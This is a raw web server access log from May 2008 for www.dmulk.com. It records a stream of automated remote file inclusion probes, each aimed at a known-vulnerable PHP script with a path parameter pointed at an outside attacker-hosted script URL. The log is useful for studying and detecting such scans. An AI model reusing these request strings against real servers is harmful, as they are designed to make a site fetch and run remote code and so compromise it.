202.60.64.194 - - [03/May/2008:09:57:44 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:09:57:46 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:58:47 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:58:47 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:59:12 -0700] "GET /logs//atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:59:12 -0700] "GET //atom.php5?page=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.59.162.173 - - [03/May/2008:09:59:19 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:59:19 -0700] "GET /logs/access_080227.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:59:19 -0700] "GET /@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:59:20 -0700] "GET /logs/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:09:59:26 -0700] "GET /logs/access_071212.log/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:09:59:27 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:09:59:28 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:59:28 -0700] "GET /logs/access_080315.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:59:31 -0700] "GET /logs/access_080227.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:59:31 -0700] "GET /@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:09:59:32 -0700] "GET /logs/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:09:59:52 -0700] "GET /logs/index.php?redir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:59:53 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:59:54 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:59:54 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.36.144.8 - - [03/May/2008:09:59:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "dmulk.com"
213.246.51.45 - - [03/May/2008:09:59:56 -0700] "GET /index.php?redir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:05 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:05 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:06 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:06 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:06 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:12 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:10:00:12 -0700] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:12 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:10:00:14 -0700] "GET /logs/access_080223.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:15 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:16 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:16 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:16 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:00:19 -0700] "GET /logs/access_080131.log/pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:00:19 -0700] "GET /logs/pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:10:00:24 -0700] "GET /logs/access_080219.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:10:00:24 -0700] "GET /@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:10:00:24 -0700] "GET /logs/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:00:29 -0700] "GET /logs/access_080131.log/pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [03/May/2008:10:00:29 -0700] "GET /logs/access_080225.log/@rfihttp://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:00:29 -0700] "GET /logs/pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:39 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:39 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:00:39 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.59.162.173 - - [03/May/2008:10:00:43 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:05 -0700] "GET /logs//atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:05 -0700] "GET //atom.php5?page=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:11 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:11 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:11 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:01:11 -0700] "GET /logs/access_080302.log/pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.90.77.57 - - [03/May/2008:10:01:12 -0700] "GET /logs/sources/lostpw.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.90.77.57 - - [03/May/2008:10:01:12 -0700] "GET /sources/lostpw.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.248.94 - - [03/May/2008:10:01:13 -0700] "GET /logs/access_080302.log/pagina.php?basepath=http://www.mariosoucy.com/voicefiles/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:19 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:19 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:19 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:19 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:19 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:23 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:25 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:25 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:25 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
84.90.89.157 - - [03/May/2008:10:01:25 -0700] "GET /logs/access_080101.log HTTP/1.1" 200 216727 "-" "gwhgwssxcrgpsfwipltgos4bm" "www.dmulk.com"
84.90.89.157 - - [03/May/2008:10:01:28 -0700] "GET /logs/access_080103.log HTTP/1.1" 200 448825 "-" "tfwciscprgaAe rcr0hra kllaxrth" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:35 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:35 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:35 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:35 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:35 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:35 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:38 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:38 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:39 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:39 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:01:39 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:01:40 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [03/May/2008:10:01:40 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.29 - - [03/May/2008:10:02:03 -0700] "GET /logs/access_080417.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:05 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:05 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:05 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:15 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:15 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:16 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:38 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:38 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:02:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:04:01 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:04:03 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:04:03 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:04:04 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:04:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:04:06 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:04:07 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:10:04:09 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:04:10 -0700] "GET /logs//interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:04:11 -0700] "GET //interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:05:25 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:10:05:25 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:10:06:24 -0700] "GET /logs/access_080131.log/pagina.php?basepath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:10:06:24 -0700] "GET /logs/pagina.php?basepath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:25 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:28 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:30 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:32 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:34 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:42 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:43 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:44 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:45 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:46 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:06:47 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:06:52 -0700] "GET /convert/mvcw.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:10:06:56 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:07:05 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:07:06 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.64.194 - - [03/May/2008:10:07:06 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:07:20 -0700] "GET /convert/mvcw.php=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
85.17.3.183 - - [03/May/2008:10:07:20 -0700] "GET /logs/convert/mvcw.php=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.108.64.164 - - [03/May/2008:10:07:25 -0700] "GET /logs/access_080302.log/pagina.php?basepath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:07:46 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:10:07:46 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:10:07:53 -0700] "GET /logs//interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:10:07:54 -0700] "GET /logs//interna.php?meio=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:10:07:54 -0700] "GET //interna.php?meio=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
